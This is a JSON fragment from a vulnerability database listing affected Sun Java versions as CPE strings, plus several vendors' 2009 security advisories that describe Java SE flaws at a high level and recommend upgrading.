"cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2020-09-02T11:46:56", "bulletinFamily": "info", "cvelist": ["CVE-2009-3876", "CVE-2009-3875", "CVE-2009-3877"], "description": "### *Detect date*:\n11/05/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in SUN Java SE. Malicious users can exploit these vulnerabilities to cause denial of service or bypass authentication. Below is a complete list of vulnerabilities\n\n### *Affected products*:\nSun Java SE 5 updates 21 and earlier \nSun Java SE 6 updates 16 and earlier \nSun Java SE 4 versions 1.4.2 update 23 and earlier \nSun Java SE 3 versions 1.3.1 update 26 and earlier\n\n### *Solution*:\nUpdate to latest version \n[Java SE](<http://www.oracle.com/technetwork/java/javase/downloads/index.html>)\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Sun Java JRE 1.6.x](<https://threats.kaspersky.com/en/product/Sun-Java-JRE-1.6.x/>)\n\n### *CVE-IDS*:\n[CVE-2009-3875](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3875>)5.0Critical \n[CVE-2009-3877](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3877>)5.0Critical \n[CVE-2009-3876](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3876>)5.0Critical", "edition": 42, "modified": "2020-05-22T00:00:00", "published": "2009-11-05T00:00:00", "id": "KLA10344", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10344", "title": "\r KLA10344Multiple vulnerabilities in Sun Java SE ", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "[1:1.6.0.0.0-1.7.b09.0.1.el5]\n- Add oracle-enterprise.patch\n[1:1.6.0-1.7.b09]\n- Fixed applying patches\n[1:1.6.0-1.6.b09]\n- Updated Release\n[1:1.6.0-1.5.b09]\n- Fixed Makefile patch\n[1:1.6.0-1.4.b09]\n- Updated release tag\n[1:1.6.0-1.3.b09]\n- Updated release ", "edition": 4, "modified": "2009-11-16T00:00:00", "published": "2009-11-16T00:00:00", "id": "ELSA-2009-1584", "href": "http://linux.oracle.com/errata/ELSA-2009-1584.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:25:29", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1584\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. The Java Runtime Environment (JRE)\ncontains the software and tools that users need to run applications written\nusing the Java programming language.\n\nAn integer overflow flaw and buffer overflow flaws were found in the way\nthe JRE processed image files. An untrusted applet or application could use\nthese flaws to extend its privileges, allowing it to read and write local\nfiles, as well as to execute local applications with the privileges of the\nuser running the applet or application. (CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3873, CVE-2009-3874)\n\nAn information leak was found in the JRE. An untrusted applet or\napplication could use this flaw to extend its privileges, allowing it to\nread and write local files, as well as to execute local applications with\nthe privileges of the user running the applet or application. (CVE-2009-3881)\n\nIt was discovered that the JRE still accepts certificates with MD2 hash\nsignatures, even though MD2 is no longer considered a cryptographically\nstrong algorithm. This could make it easier for an attacker to create a\nmalicious certificate that would be treated as trusted by the JRE. With\nthis update, the JRE disables the use of the MD2 algorithm inside\nsignatures by default. (CVE-2009-2409)\n\nA timing attack flaw was found in the way the JRE processed HMAC digests.\nThis flaw could aid an attacker using forged digital signatures to bypass\nauthentication checks. (CVE-2009-3875)\n\nTwo denial of service flaws were found in the JRE. These could be exploited\nin server-side application scenarios that process DER-encoded\n(Distinguished Encoding Rules) data. (CVE-2009-3876, CVE-2009-3877)\n\nAn information leak was found in the way the JRE handled color profiles. An\nattacker could use this flaw to discover the existence of files outside of\nthe color profiles directory. (CVE-2009-3728)\n\nA flaw in the JRE with passing arrays to the X11GraphicsDevice API was\nfound. An untrusted applet or application could use this flaw to access and\nmodify the list of supported graphics configurations. This flaw could also\nlead to sensitive information being leaked to unprivileged code.\n(CVE-2009-3879)\n\nIt was discovered that the JRE passed entire objects to the logging API.\nThis could lead to sensitive information being leaked to either untrusted\nor lower-privileged code from an attacker-controlled applet which has\naccess to the logging API and is therefore able to manipulate (read and/or\ncall) the passed objects. (CVE-2009-3880)\n\nPotential information leaks were found in various mutable static variables.\nThese could be exploited in application scenarios that execute untrusted\nscripting code. (CVE-2009-3882, CVE-2009-3883)\n\nAn information leak was found in the way the TimeZone.getTimeZone method\nwas handled. This method could load time zone files that are outside of the\n[JRE_HOME]/lib/zi/ directory, allowing a remote attacker to probe the local\nfile system. (CVE-2009-3884)\n\nNote: The flaws concerning applets in this advisory, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3873, CVE-2009-3874, CVE-2009-3879, CVE-2009-3880,\nCVE-2009-3881 and CVE-2009-3884, can only be triggered in\njava-1.6.0-openjdk by calling the \"appletviewer\" application.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028366.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028367.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1584.html", "edition": 3, "modified": "2009-11-18T10:19:03", "published": "2009-11-18T10:19:02", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/028366.html", "id": "CESA-2009:1584", "title": "java security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:30:20", "published": "2009-11-14T03:30:20", "id": "FEDORA:BD01E10F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-30.b16.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:33:25", "published": "2009-11-14T03:33:25", "id": "FEDORA:1C6D410F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-23.b16.fc10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:32:17", "published": "2009-11-14T03:32:17", "id": "FEDORA:9A32710F7FF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: java-1.6.0-openjdk-1.6.0.0-33.b16.fc12", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:25:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3885", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "Dan Kaminsky discovered that SSL certificates signed with MD2 could be \nspoofed given enough time. As a result, an attacker could potentially \ncreate a malicious trusted certificate to impersonate another site. This \nupdate handles this issue by completely disabling MD2 for certificate \nvalidation in OpenJDK. (CVE-2009-2409)\n\nIt was discovered that ICC profiles could be identified with \n\"..\" pathnames. If a user were tricked into running a specially \ncrafted applet, a remote attacker could gain information about a local \nsystem. (CVE-2009-3728)\n\nPeter Vreugdenhil discovered multiple flaws in the processing of graphics \nin the AWT library. If a user were tricked into running a specially \ncrafted applet, a remote attacker could crash the application or run \narbitrary code with user privileges. (CVE-2009-3869, CVE-2009-3871)\n\nMultiple flaws were discovered in JPEG and BMP image handling. If a user \nwere tricked into loading a specially crafted image, a remote attacker \ncould crash the application or run arbitrary code with user privileges. \n(CVE-2009-3873, CVE-2009-3874, CVE-2009-3885)\n\nCoda Hale discovered that HMAC-based signatures were not correctly \nvalidated. Remote attackers could bypass certain forms of authentication, \ngranting unexpected access. (CVE-2009-3875)\n\nMultiple flaws were discovered in ASN.1 parsing. A remote attacker \ncould send a specially crafted HTTP stream that would exhaust system \nmemory and lead to a denial of service. (CVE-2009-3876, CVE-2009-3877)\n\nIt was discovered that the graphics configuration subsystem did \nnot correctly handle arrays. If a user were tricked into running \na specially crafted applet, a remote attacker could exploit this \nto crash the application or execute arbitrary code with user \nprivileges. (CVE-2009-3879)\n\nIt was discovered that loggers and Swing did not correctly handle \ncertain sensitive objects. If a user were tricked into running a \nspecially crafted applet, private information could be leaked to a remote \nattacker, leading to a loss of privacy. (CVE-2009-3880, CVE-2009-3882, \nCVE-2009-3883)\n\nIt was discovered that the ClassLoader did not correctly handle certain \noptions. If a user were tricked into running a specially crafted \napplet, a remote attacker could execute arbitrary code with user \nprivileges. (CVE-2009-3881)\n\nIt was discovered that time zone file loading could be used to determine \nthe existence of files on the local system. If a user were tricked into \nrunning a specially crafted applet, private information could be leaked \nto a remote attacker, leading to a loss of privacy. (CVE-2009-3884)", "edition": 5, "modified": "2009-11-12T00:00:00", "published": "2009-11-12T00:00:00", "id": "USN-859-1", "href": "https://ubuntu.com/security/notices/USN-859-1", "title": "OpenJDK vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}